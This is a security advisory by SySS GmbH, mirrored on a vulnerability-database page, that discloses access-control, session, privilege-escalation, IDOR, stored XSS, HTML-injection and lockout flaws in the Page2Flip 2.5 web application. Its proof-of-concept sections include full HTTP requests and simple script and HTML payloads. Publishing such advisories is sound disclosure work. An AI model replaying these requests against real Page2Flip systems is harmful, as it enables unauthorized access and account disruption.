Vulners
Lucene search
Page2Flip 2.5 - Multiple Vulnerabilities
Product: Page2Flip
Vendor: w!ssenswerft GmbH
Affected Version(s): Premium App 2.5, probably also in Business App
and Basic App, and in lower versions
Tested Version(s): Premium App 2.5
Vulnerability Type: Missing Function Level Access Control (CWE-935)
Risk Level: High
Solution Status: Open
Vendor Notification: 2015-06-29
Solution Date:
Public Disclosure:
CVE Reference: Not yet assigned
Author of Advisory: Dr. Erlijn van Genuchten (SySS GmbH)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Overview:
With the Page2Flip Web application, it is possible to create e-papers in
PDF format that can be flicked through digitally. Such e-papers can be
used for magazines, catalogues, flyers, etc. (see [1]).
The Page2Flip app allows users to access functionality that should only
be available for administrative users.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Page2Flip 2.5 Missing Access Control Vulnerability Details:
The SySS GmbH identified that it is possible for a user with low
privileges, to access functionality that should only be accessible by
administrators, by directly entering the URL.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Proof of Concept (PoC):
For example, by accessing the URL https://[host]/settings/users, all
user names and e-mail addresses can be accessed. Also, by accessing the
URL https://[host]/settings/extended, it is possible to perform the same
actions as high privileged users are able to perform.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Page2Flip 2.5 Session Management Vulnerability Details:
The SySS GmbH was as an administrative user able to delete user accounts.
However, these users were after that still able to login with their
credentials when following the normal login procedure.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Proof of Concept (PoC):
Create a user account with known credentials, delete this account and
login with these credentials.
The POST request for deleting a user is:
POST /settings/users HTTP/1.1
Host: [host]
Faces-Request: partial/ajax
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 1042
Cookie: [cookies]
form_userSettings=form_userSettings&javax.faces.ViewState=-5924384961489816147%3A2243478473205355579&ice.window=9aib95sifa&ice.view=vvgml70e1&icefacesCssUpdates=&form_userSettings%3Aj_idcl=form_userSettings%3AuserTable%3A0%3AdeleteAccount%3Aactionicon&javax.faces.source=form_userSettings%3AuserTable%3A0%3AdeleteAccount%3Aactionicon&javax.faces.partial.event=click&javax.faces.partial.execute=%40all&javax.faces.partial.render=%40all&ice.window=9aib95sifa&ice.view=vvgml70e1&ice.focus=form_userSettings%3AuserTable%3A0%3AdeleteAccount%3Aactionicon&form_userSettings%3AuserTable%3A0%3AdeleteAccount%3Aactionicon=form_userSettings%3AuserTable%3A0%3AdeleteAccount%3Aactionicon&ice.event.target=bimg&ice.event.captured=form_userSettings%3AuserTable%3A0%3AdeleteAccount%3Aactionicon&ice.event.type=onclick&ice.event.alt=false&ice.event.ctrl=false&ice.event.shift=false&ice.event.meta=false&ice.event.x=1368&ice.event.y=373&ice.event.left=true&ice.event.right=false&ice.submit.type=ice.s&ice.sub
mit.serialization=form&javax.faces.partial.ajax=true
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Page2Flip 2.5 Privilege Escalation Vulnerability Details:
The SySS GmbH identified a vulnerability in the "publish" functionality
of the Page2Flip application.
Users who are not allowed to publish documents are nevertheless able to
do so.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Proof of Concept (PoC):
The following HTTP POST request was sent by a user who did not possess
the privilege to publish documents.
POST /catalog/[catalog id]/publishview HTTP/1.1
Host: [host]
Faces-Request: partial/ajax
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 1132
Cookie: [cookies]
downloadDialogForm=downloadDialogForm&javax.faces.ViewState=-8995724769283342270%3A-6610202228620183009&ice.window=9aibc007ll&ice.view=vvgml70v8&downloadDialogForm%3Ard_releaseTypeDownload=ext_catalog&downloadDialogForm%3Aj_idt916=Please%20choose...&icefacesCssUpdates=&javax.faces.source=downloadDialogForm%3AdownloadDialogForm_submit%3AdownloadDialogForm_submit&javax.faces.partial.event=click&javax.faces.partial.execute=%40all&javax.faces.partial.render=%40all&ice.window=9aibc007ll&ice.view=vvgml70v8&ice.focus=downloadDialogForm%3AdownloadDialogForm_submit%3AdownloadDialogForm_submit&downloadDialogForm%3AdownloadDialogForm_submit%3AdownloadDialogForm_submit=Start%20download&ice.event.target=downloadDialogForm%3AdownloadDialogForm_submit%3AdownloadDialogForm_submit&ice.event.captured=downloadDialogForm%3AdownloadDialogForm_submit%3AdownloadDialogForm_submit&ice.event.type=onclick&ice.event.alt=false&ice.event.ctrl=false&ice.event.shift=false&ice.event.meta=false&ice.event.x=11
69&ice.event.y=796&ice.event.left=true&ice.event.right=false&ice.submit.type=ice.s&ice.submit.serialization=form&javax.faces.partial.ajax=true
After sending this request, the user received an e-mail stating "You can
download your pageflip!".
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Page2Flip 2.5 Insecure Direct Object Reference Vulnerability Details:
The SySS GmbH identified a vulnerability in the "preview" functionality
of the Page2Flip application.
Pageflip preview content can be accessed by unauthenticated users if
a valid URL is known.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Proof of Concept (PoC):
By knowing or guessing a valid URL for pageflip preview content, an
unauthenticated user can access this data.
Page2Flip 2.5 Cross Site Scripting Vulnerability Details:
The SySS GmbH identified a persistent cross-site scripting vulnerability
in the Page2Flip Premium App.
At least the parameters "first name" and "last name" are not sanitized
sufficiently resulting in a persistent cross-site scripting
vulnerability.
This reflected cross-site scripting vulnerability can be exploited in
the context of an authenticated user by storing script code in one of
these fields.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Proof of Concept (PoC):
The following HTTP POST request using the JavaScript code
"<script>alert(1)</script>" as the value for the parameter "nachname"
demonstrates the persistent cross-site scripting vulnerability by
showing a JavaScript alert box as soon as this user has logged on:
POST /settings/users HTTP/1.1
Host: <host>
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 1239
Cookie: <cookies>
accountEditForm=accountEditForm&javax.faces.ViewState=437392726575022409%3A-3508488346630943554&ice.window=9aib95sifa&ice.view=vvgml70d9&accountEditForm%3Aanrede=xxx&accountEditForm%3Avorname=xxx&accountEditForm%3Anachname=xxx%3Cscript%3Ealert(1)%3C%2Fscript%3E&accountEditForm%3Aemail=xxx&accountEditForm%3Apassword=xxx&accountEditForm%3Arights=ROLE_ADMINISTRATE_USER&accountEditForm%3Arights=ROLE_PUBLISH_DOCUMENTS&accountEditForm%3Arights=ROLE_CHANGE_SETTINGS&accountEditForm%3Arights=ROLE_CREATE_CUSTOMER&icefacesCssUpdates=&javax.faces.source=accountEditForm%3AsubmitBtn%3AsubmitBtn&javax.faces.partial.event=click&javax.faces.partial.execute=%40all&javax.faces.partial.render=%40all&ice.window=9aib95sifa&ice.view=vvgml70d9&ice.focus=accountEditForm%3AsubmitBtn%3AsubmitBtn&accountEditForm%3AsubmitBtn%3AsubmitBtn=Save&ice.event.target=accountEditForm%3AsubmitBtn%3AsubmitBtn&ice.event.captured=accountEditForm%3AsubmitBtn%3AsubmitBtn&ice.event.type=onclick&ice.event.alt=false&ice.ev
ent.ctrl=false&ice.event.shift=false&ice.event.meta=false&ice.event.x=1281&ice.event.y=752&ice.event.left=true&ice.event.right=false&ice.submit.type=ice.s&ice.submit.serialization=form&javax.faces.partial.ajax=true
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Proof of Concept (PoC):
The following HTTP POST request using the HTML code
"<div+style="display:none;">" as the value for the parameter "nachname"
demonstrates that HTML code can be injected:
POST /settings/users HTTP/1.1
Host: [host]
Faces-Request: partial/ajax
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 1198
Cookie: [cookies]
accountEditForm=accountEditForm&javax.faces.ViewState=4267992298149872508%3A938284134061579979&ice.window=9aibbsfanj&ice.view=vvgml70uz&accountEditForm%3Aanrede=xxx&accountEditForm%3Avorname=%3Cdiv%20style%3D%22display%3Anone%3B%22%3E&accountEditForm%3Anachname=xxx&accountEditForm%3Aemail=xxx&accountEditForm%3Apassword=xxx&icefacesCssUpdates=&javax.faces.source=accountEditForm%3AsubmitBtn%3AsubmitBtn&javax.faces.partial.event=click&javax.faces.partial.execute=%40all&javax.faces.partial.render=%40all&ice.window=9aibbsfanj&ice.view=vvgml70uz&ice.focus=accountEditForm%3AsubmitBtn%3AsubmitBtn&accountEditForm%3AsubmitBtn%3AsubmitBtn=Save&ice.event.target=accountEditForm%3AsubmitBtn%3AsubmitBtn&ice.event.captured=accountEditForm%3AsubmitBtn%3AsubmitBtn&ice.event.type=onclick&ice.event.alt=false&ice.event.ctrl=false&ice.event.shift=false&ice.event.meta=false&ice.event.x=1251&ice.event.y=780&ice.event.left=true&ice.event.right=false&ice.submit.type=ice.s&ice.submit.serialization=form
&javax.faces.partial.ajax=true
The HTML e-mail source code of the resulting e-mail of the PoC contains
the following HTML code
Hello <div style="display:none;"> xxx <br>
rendering all subsequent automatically added content invisible.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Overview:
With the Page2Flip Web application, it is possible to create e-papers in
PDF format that can be flicked through digitally. Such e-papers can be
used for magazines, catalogues, flyers, etc. (see [1]).
The Page2Flip application is vulnerable to denial-of-service attacks
against user accounts.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Page2Flip 2.5 Denial Of Service Vulnerability Details:
The SySS GmbH identified a denial-of-service vulnerability in the user
login functionality. When for a user account, a wrong password has been
entered five times, this user account is locked.
This user account cannot be unlocked by an administrative user, nor is
it automatically unlocked after at least 12 hours.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Proof of Concept (PoC):
Enter for an existing e-mail address a wrong password five times.
Disclosure Timeline:
2015-06-23: Vulnerability discovered
2015-06-29: Vulnerability reported to vendor
2015-07-07: Reported vulnerabilities again as the vendor did not respond
to the first e-mail
2015-07-14: Reminder sent concerning reported vulnerabilities
2015-08-24: Public release of security advisory according to the SySS
Responsible Disclosure Policy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
References:
[1] Page2Flip homepage
http://page2flip.de/
[2] SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/
# 0day.today [2018-02-21] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 Aug 2015 00:00Current
7.1High risk
Vulners AI Score7.1